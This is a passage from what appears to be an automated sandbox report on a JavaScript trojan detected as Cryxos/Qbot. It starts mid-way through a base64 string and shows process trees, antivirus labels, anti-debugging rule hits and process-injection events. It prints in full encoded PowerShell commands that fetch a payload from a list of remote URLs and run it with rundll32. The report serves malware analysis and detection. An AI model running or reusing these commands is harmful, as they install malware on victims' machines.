EARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
MicroWorld-eScan JS:Trojan.Cryxos.12541
VIPRE JS:Trojan.Cryxos.12541
Arcabit JS:Trojan.Cryxos.D30FD
Cyren JS/Agent.BVS
Symantec Scr.Malcode!gen53
ESET-NOD32 JS/Agent.QTW
Kaspersky HEUR:Trojan.Script.Qbot.gen
BitDefender JS:Trojan.Cryxos.12541
Emsisoft JS:Trojan.Cryxos.12541 (B)
FireEye JS:Trojan.Cryxos.12541
Ikarus Trojan-Downloader.JS.Agent
Microsoft Trojan:Script/Wacatac.B!ml
GData JS:Trojan.Cryxos.12541
Google Detected
ALYac JS:Trojan.Cryxos.12541
MAX malware (ai score=83)
Fortinet JS/Agent.QAK!tr
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEIAQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="
parent_process wscript.exe martian_process powershell -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEIAQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="
parent_process wscript.exe martian_process wscript "C:\ProgramData\diversityCourtby.js" isohelNoncumulatively Blackmailers storified thyrotomy
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" "C:\ProgramData\diversityCourtby.js" isohelNoncumulatively Blackmailers storified thyrotomy
Process injection Process 1932 resumed a thread in remote process 2632
Process injection Process 2632 resumed a thread in remote process 2740
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000308
suspend_count: 1
process_identifier: 2632
1 0 0

NtResumeThread

thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 2740
1 0 0
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe